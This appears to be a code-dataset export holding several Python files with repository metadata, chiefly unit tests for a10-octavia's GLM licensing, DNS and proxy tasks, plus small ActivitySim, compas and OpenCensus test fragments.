# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': '123456789012'
# }
# },
# 'g.co/r/aws_ec2_instance/region': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value': 'aws:us-west-2'
# }
# },
# }
# }
# }
# mock_resource = mock.Mock()
# mock_resource.get_type.return_value = 'aws_ec2_instance'
# mock_resource.get_labels.return_value = {
# 'aws_account': '123456789012',
# 'region': 'us-west-2'
# }
# amr_mock.return_value = mock_resource
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
# @mock.patch('opencensus.ext.stackdriver.trace_exporter.'
# 'monitored_resource.get_instance')
# def test_monitored_resource_attributes_None(self, mr_mock):
# trace = {'spans': [{'attributes': {}}]}
# expected = {
# 'attributes': {
# 'attributeMap': {
# 'g.co/agent': {
# 'string_value': {
# 'truncated_byte_count': 0,
# 'value':
# 'opencensus-python [{}]'.format(__version__)
# }
# }
# }
# }
# }
# mr_mock.return_value = None
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
# mock_resource = mock.Mock()
# mock_resource.get_type.return_value = mock.Mock()
# mock_resource.get_labels.return_value = mock.Mock()
# mr_mock.return_value = mock_resource
# trace_exporter.set_attributes(trace)
# span = trace.get('spans')[0]
# self.assertEqual(span, expected)
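# # MockTransport stands in for a real transport; it records whether export()
# # was called so TestStackdriverExporter.test_export can assert on it.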
# class MockTransport(object):
# def __init__(self, exporter=None):
# self.export_called = False
# self.exporter = exporter
# def export(self, trace):
# self.export_called = True
| 35.922989 | 78 | 0.377532 | 2,082 | 31,253 | 5.380884 | 0.122478 | 0.075426 | 0.104436 | 0.110238 | 0.746675 | 0.723378 | 0.711684 | 0.686691 | 0.646434 | 0.617602 | 0 | 0.018921 | 0.502832 | 31,253 | 869 | 79 | 35.964327 | 0.702085 | 0.946021 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
16d598357610ff4251a1f2b8f94d3a13fbcd182e | 23,671 | py | Python | a10_octavia/tests/unit/controller/worker/tasks/test_glm_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 5 | 2020-03-10T16:48:55.000Z | 2021-09-18T00:57:58.000Z | a10_octavia/tests/unit/controller/worker/tasks/test_glm_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 72 | 2019-08-10T01:16:59.000Z | 2021-12-13T08:20:36.000Z | a10_octavia/tests/unit/controller/worker/tasks/test_glm_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 27 | 2019-08-11T19:26:52.000Z | 2021-07-21T09:08:58.000Z | # Copyright 2021, A10 Networks
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import imp
try:
from unittest import mock
except ImportError:
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from octavia.common import data_models as o_data_models
from octavia.network import data_models as n_data_models
from octavia.tests.common import constants as t_constants
from a10_octavia.common import config_options
from a10_octavia.common import data_models as a10_data_models
from a10_octavia.common import exceptions as a10_ex
from a10_octavia.controller.worker.tasks import glm_tasks as task
from a10_octavia.tests.common import a10constants
from a10_octavia.tests.unit import base
VTHUNDER = a10_data_models.VThunder(id=a10constants.MOCK_VTHUNDER_ID)
AMPHORA = o_data_models.Amphora(id=t_constants.MOCK_AMP_ID1)
DNS_SUBNET = n_data_models.Subnet(id=a10constants.MOCK_SUBNET_ID)
DNS_NETWORK = n_data_models.Network(id=a10constants.MOCK_NETWORK_ID,
subnets=[DNS_SUBNET.id])
PRIMARY_DNS = '1.3.3.7'
SECONDARY_DNS = '1.0.0.7'
PROXY_HOST = '10.10.10.10'
PROXY_PORT = 1111
PROXY_USERNAME = 'user'
PROXY_PASSWORD = True
PROXY_PASSWORD_VALUE = 'password'
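# Shared fixtures: a vThunder device record, an Octavia amphora, and a license
# network with one subnet that the DNS-configuration tests resolve nameservers
# from.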
class TestGLMTasks(base.BaseTaskTestCase):
def setUp(self):
super(TestGLMTasks, self).setUp()
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
self.conf.register_opts(config_options.A10_GLM_LICENSE_OPTS,
group=a10constants.A10_GLOBAL_CONF_SECTION)
imp.reload(task)
self.client_mock = mock.Mock()
self.db_session = mock.patch(
'a10_octavia.controller.worker.tasks.a10_database_tasks.db_apis.get_session')
self.db_session.start()
def tearDown(self):
super(TestGLMTasks, self).tearDown()
self.conf.reset()
def test_DNSConfiguration_execute_no_vthunder_warn(self):
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
log_message = str("No vthunder therefore dns cannot be assigned.")
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
dns_task.execute(None)
self.assertEqual(expected_log, cm.output)
def test_DNSConfiguration_execute_no_network_id_warn(self):
vthunder = copy.deepcopy(VTHUNDER)
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
log_message = str("No networks were configured therefore "
"nameservers cannot be set on the "
"vThunder-Amphora {}").format(a10constants.MOCK_VTHUNDER_ID)
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
dns_task.execute(vthunder)
self.assertEqual(expected_log, cm.output)
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_no_dns(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
self.client_mock.dns.set.assert_not_called()
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_use_license_net_primary_only(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id, primary_dns=PRIMARY_DNS)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, None))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_with_primary_secondary(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
primary_dns=PRIMARY_DNS, secondary_dns=SECONDARY_DNS)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_use_network_dns(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
dns_subnet = copy.deepcopy(DNS_SUBNET).to_dict()
dns_subnet['dns_nameservers'] = [PRIMARY_DNS, SECONDARY_DNS]
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = dns_subnet
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_too_many_network_dns_warn(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
dns_subnet = copy.deepcopy(DNS_SUBNET).to_dict()
dns_subnet['dns_nameservers'] = [PRIMARY_DNS, SECONDARY_DNS, '3.3.3.3']
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = dns_subnet
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
log_message = ("More than one DNS nameserver detected on subnet {}. "
"Using {} as primary and {} as secondary.".format(
DNS_SUBNET.id, PRIMARY_DNS, SECONDARY_DNS))
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
dns_task.execute(vthunder)
self.assertEqual(expected_log, cm.output)
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_use_amp_mgmt_net(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
primary_dns=PRIMARY_DNS, secondary_dns=SECONDARY_DNS)
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_mgmt_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_use_first_amp_boot_net(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
primary_dns=PRIMARY_DNS, secondary_dns=SECONDARY_DNS)
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_boot_network_list=[DNS_NETWORK.id, 'random-net'])
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
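# Precedence checks: values in the GLM config section override the subnet's
# dns_nameservers, and flavor-supplied DNS overrides both.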
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_config_precedence(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
primary_dns=PRIMARY_DNS, secondary_dns=SECONDARY_DNS)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
dns_subnet = copy.deepcopy(DNS_SUBNET).to_dict()
dns_subnet['dns_nameservers'] = ['8.8.8.8', '8.8.4.4']
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = dns_subnet
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_flavor_dns(self, network_driver_mock):
flavor = {'dns': {'primary-dns': PRIMARY_DNS, 'secondary-dns': SECONDARY_DNS}}
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder, flavor)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_flavor_dns_precedence(self, network_driver_mock):
flavor = {'dns': {'primary-dns': PRIMARY_DNS, 'secondary-dns': SECONDARY_DNS}}
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
primary_dns='1.0.1.0', secondary_dns='0.1.0.1')
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
dns_subnet = copy.deepcopy(DNS_SUBNET).to_dict()
dns_subnet['dns_nameservers'] = ['8.8.8.8', '8.8.4.4']
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = dns_subnet
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder, flavor)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_with_secondary_fail(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
secondary_dns=SECONDARY_DNS)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
self.assertRaises(a10_ex.PrimaryDNSMissing, dns_task.execute, vthunder)
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_revert_delete_dns(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
secondary_dns=SECONDARY_DNS)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.revert(vthunder)
args, kwargs = self.client_mock.dns.delete.call_args
self.assertEqual(args, (None, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_revert_no_dns_return(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
# revert (not execute) is under test here: with no DNS configured it should
# return before ever calling dns.delete
dns_task.revert(vthunder)
self.client_mock.dns.delete.assert_not_called()
def test_ActivateFlexpoolLicense_execute_no_vthunder_warn(self):
flexpool_task = task.ActivateFlexpoolLicense()
flexpool_task.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
log_message = str("No vthunder therefore licensing cannot occur.")
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
flexpool_task.execute(None, None)
self.assertEqual(expected_log, cm.output)
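# Baseline kwargs expected in the glm.create call when only the flexpool token
# is configured; individual tests copy this template and override fields.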
def _template_glm_call(self):
expected_call = {
'token': a10constants.MOCK_FLEXPOOL_TOKEN,
'burst': False,
'enable_requests': True,
'interval': None,
'port': 443,
'allocate_bandwidth': None,
'use_mgmt_port': False
}
return expected_call
def test_ActivateFlexpoolLicense_execute_success(self):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
flexpool_token=a10constants.MOCK_FLEXPOOL_TOKEN)
vthunder = copy.deepcopy(VTHUNDER)
amphora = copy.deepcopy(AMPHORA)
interfaces = {
'interface': {
'ethernet-list': []
}
}
expected_call = self._template_glm_call()
flexpool_task = task.ActivateFlexpoolLicense()
flexpool_task.axapi_client = self.client_mock
flexpool_task.axapi_client.interface.get_list.return_value = interfaces
flexpool_task.execute(vthunder, amphora)
args, kwargs = self.client_mock.glm.create.call_args
self.assertEqual(kwargs, expected_call)
def test_ActivateFlexpoolLicense_execute_use_mgmt_port(self):
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_mgmt_network=DNS_NETWORK.id)
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
flexpool_token=a10constants.MOCK_FLEXPOOL_TOKEN)
vthunder = copy.deepcopy(VTHUNDER)
amphora = copy.deepcopy(AMPHORA)
interfaces = {
'interface': {
'ethernet-list': []
}
}
expected_call = self._template_glm_call()
expected_call['use_mgmt_port'] = True
flexpool_task = task.ActivateFlexpoolLicense()
flexpool_task.axapi_client = self.client_mock
flexpool_task.axapi_client.interface.get_list.return_value = interfaces
flexpool_task.execute(vthunder, amphora)
args, kwargs = self.client_mock.glm.create.call_args
self.assertEqual(kwargs, expected_call)
def test_ActivateFlexpoolLicense_execute_iface_up(self):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
flexpool_token=a10constants.MOCK_FLEXPOOL_TOKEN)
vthunder = copy.deepcopy(VTHUNDER)
amphora = copy.deepcopy(AMPHORA)
interfaces = {
'interface': {
'ethernet-list': [{
'ifnum': 2,
'action': 'disable'
}]
}
}
flexpool_task = task.ActivateFlexpoolLicense()
flexpool_task.axapi_client = self.client_mock
flexpool_task.axapi_client.interface.get_list.return_value = interfaces
flexpool_task.execute(vthunder, amphora)
self.client_mock.system.action.setInterface.assert_called_with(2)
def test_ActivateFlexpoolLicense_revert_deactivate_license(self):
vthunder = copy.deepcopy(VTHUNDER)
amphora = copy.deepcopy(AMPHORA)
flexpool_task = task.ActivateFlexpoolLicense()
flexpool_task.axapi_client = self.client_mock
flexpool_task.revert(vthunder, amphora)
self.client_mock.delete.glm_license.post.assert_called()
def test_RevokeFlexpoolLicense_execute_success(self):
vthunder = copy.deepcopy(VTHUNDER)
revoke_task = task.RevokeFlexpoolLicense()
revoke_task.axapi_client = self.client_mock
revoke_task.execute(vthunder)
self.client_mock.delete.glm_license.post.assert_called()
def test_RevokeFlexpoolLicense_execute_no_vthunder_warn(self):
revoke_task = task.RevokeFlexpoolLicense()
revoke_task.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
log_message = str("No vthunder therefore license revocation cannot occur.")
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
revoke_task.execute(None)
self.assertEqual(expected_log, cm.output)
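# Forward-proxy tests: proxy settings from a flavor's 'glm-proxy-server' block
# take precedence over the GLM config section.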
def test_ConfigureForwardProxyServer_execute_success(self):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
proxy_host=PROXY_HOST, proxy_port=PROXY_PORT,
proxy_username=PROXY_USERNAME, proxy_password=PROXY_PASSWORD,
proxy_secret_string=PROXY_PASSWORD_VALUE)
vthunder = copy.deepcopy(VTHUNDER)
proxy_server = task.ConfigureForwardProxyServer()
proxy_server.axapi_client = self.client_mock
proxy_server.execute(vthunder)
self.client_mock.glm.proxy_server.create.assert_called()
def test_ConfigureForwardProxyServer_execute_flavor_success(self):
flavor = {
'glm-proxy-server': {
'proxy_host': PROXY_HOST,
'proxy_port': PROXY_PORT,
'proxy_username': PROXY_USERNAME,
'proxy_password': PROXY_PASSWORD,
'proxy_secret_string': PROXY_PASSWORD_VALUE
}
}
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
proxy_host="10.10.10.11", proxy_port=8888,
proxy_username='configuser', proxy_password=False,
proxy_secret_string='configpwrd')
vthunder = copy.deepcopy(VTHUNDER)
proxy_server = task.ConfigureForwardProxyServer()
proxy_server.axapi_client = self.client_mock
proxy_server.execute(vthunder, flavor)
self.client_mock.glm.proxy_server.create.assert_called_with(**{'host': PROXY_HOST,
'port': PROXY_PORT,
'username': PROXY_USERNAME,
'password': PROXY_PASSWORD,
'secret_string':
PROXY_PASSWORD_VALUE})
def test_ConfigureForwardProxyServer_execute_no_vthunder_warn(self):
proxy_server = task.ConfigureForwardProxyServer()
proxy_server.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
log_message = str("No vthunder therefore forward proxy server cannot be configured.")
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
proxy_server.execute(None, None)
self.assertEqual(expected_log, cm.output)
def test_ConfigureForwardProxyServer_execute_no_proxy_conf(self):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
proxy_host=None, proxy_port=None)
vthunder = copy.deepcopy(VTHUNDER)
proxy_server = task.ConfigureForwardProxyServer()
proxy_server.axapi_client = self.client_mock
proxy_server.execute(vthunder)
self.client_mock.glm.proxy_server.create.assert_not_called()
| 49.417537 | 99 | 0.691268 | 2,799 | 23,671 | 5.508039 | 0.087531 | 0.040475 | 0.041772 | 0.035415 | 0.824609 | 0.78861 | 0.780372 | 0.775508 | 0.772005 | 0.768632 | 0 | 0.011544 | 0.224198 | 23,671 | 478 | 100 | 49.520921 | 0.827979 | 0.024418 | 0 | 0.641089 | 0 | 0 | 0.102401 | 0.058286 | 0 | 0 | 0 | 0 | 0.079208 | 1 | 0.071782 | false | 0.022277 | 0.039604 | 0 | 0.116337 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bc860f2292fe5e8a47c46c7aa9e3b8a814076c40 | 40 | py | Python | Mesh/util/numpy_ext/__init__.py | ys-warble/Mesh | 115e7391d19ea09db3c627d8b8ed90b3e3bef9b5 | [
"MIT"
] | null | null | null | Mesh/util/numpy_ext/__init__.py | ys-warble/Mesh | 115e7391d19ea09db3c627d8b8ed90b3e3bef9b5 | [
"MIT"
] | 2 | 2019-02-25T00:10:15.000Z | 2019-03-22T20:13:32.000Z | Mesh/util/numpy_ext/__init__.py | ys-warble/Mesh | 115e7391d19ea09db3c627d8b8ed90b3e3bef9b5 | [
"MIT"
] | null | null | null | import Mesh.util.numpy_ext.char as char
| 20 | 39 | 0.825 | 8 | 40 | 4 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 40 | 1 | 40 | 40 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bce1866f0685e2d6a625544b9f45364d06777206 | 188 | py | Python | src/compas/numerical/algorithms/__init__.py | philianeles/compas | 129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1 | [
"MIT"
] | null | null | null | src/compas/numerical/algorithms/__init__.py | philianeles/compas | 129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1 | [
"MIT"
] | null | null | null | src/compas/numerical/algorithms/__init__.py | philianeles/compas | 129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from .pca_numpy import *
from .topop_numpy import *
from .pca_numpy import __all__ as a7
from .topop_numpy import __all__ as a8
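# aggregate the public API re-exported from both submodules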
__all__ = a7 + a8
| 18.8 | 38 | 0.787234 | 30 | 188 | 4.233333 | 0.366667 | 0.346457 | 0.204724 | 0.283465 | 0.377953 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.170213 | 188 | 9 | 39 | 20.888889 | 0.788462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.833333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4c1be44c485f48a41f2e487500e840b021875875 | 1,096 | py | Python | activitysim/activitysim/abm/test/extensions/landuse.py | ual/DOE-repo-deliverable | 4bafdd9a702a9a6466dd32ae62f440644d735d3c | [
"BSD-3-Clause"
] | null | null | null | activitysim/activitysim/abm/test/extensions/landuse.py | ual/DOE-repo-deliverable | 4bafdd9a702a9a6466dd32ae62f440644d735d3c | [
"BSD-3-Clause"
] | null | null | null | activitysim/activitysim/abm/test/extensions/landuse.py | ual/DOE-repo-deliverable | 4bafdd9a702a9a6466dd32ae62f440644d735d3c | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import pandas as pd
import orca
@orca.column("land_use")
def total_households(land_use):
return land_use.local.TOTHH
@orca.column("land_use")
def total_employment(land_use):
return land_use.local.TOTEMP
@orca.column("land_use")
def total_acres(land_use):
return land_use.local.TOTACRE
@orca.column("land_use")
def county_id(land_use):
return land_use.local.COUNTY
@orca.column("land_use")
def household_density(land_use):
return land_use.total_households / land_use.total_acres
@orca.column("land_use")
def employment_density(land_use):
return land_use.total_employment / land_use.total_acres
@orca.column("land_use")
def density_index(land_use):
# FIXME - avoid div by 0
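# the .clip(lower=1) on the denominator keeps the ratio defined when both densities are zero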
return (land_use.household_density * land_use.employment_density) / \
(land_use.household_density + land_use.employment_density).clip(lower=1)
@orca.column("land_use")
def county_name(land_use, settings):
assert "county_map" in settings
inv_map = {v: k for k, v in settings["county_map"].items()}
return land_use.county_id.map(inv_map)
| 22.367347 | 80 | 0.75 | 171 | 1,096 | 4.51462 | 0.251462 | 0.262953 | 0.145078 | 0.176166 | 0.620466 | 0.59456 | 0.300518 | 0.217617 | 0.095855 | 0 | 0 | 0.002116 | 0.137774 | 1,096 | 48 | 81 | 22.833333 | 0.814815 | 0.020073 | 0 | 0.266667 | 0 | 0 | 0.078358 | 0 | 0 | 0 | 0 | 0.020833 | 0.033333 | 1 | 0.266667 | false | 0 | 0.1 | 0.233333 | 0.633333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
4c3545afe54add9b8968863d4a6597edcb7e14de | 2,897 | py | Python | tests/unit_tests/test_charger_lock.py | hobbe/teslajsonpy | 1d185a13ddf8024d74bd7a6bec5d798ca0270f61 | [
"Apache-2.0"
] | null | null | null | tests/unit_tests/test_charger_lock.py | hobbe/teslajsonpy | 1d185a13ddf8024d74bd7a6bec5d798ca0270f61 | [
"Apache-2.0"
] | null | null | null | tests/unit_tests/test_charger_lock.py | hobbe/teslajsonpy | 1d185a13ddf8024d74bd7a6bec5d798ca0270f61 | [
"Apache-2.0"
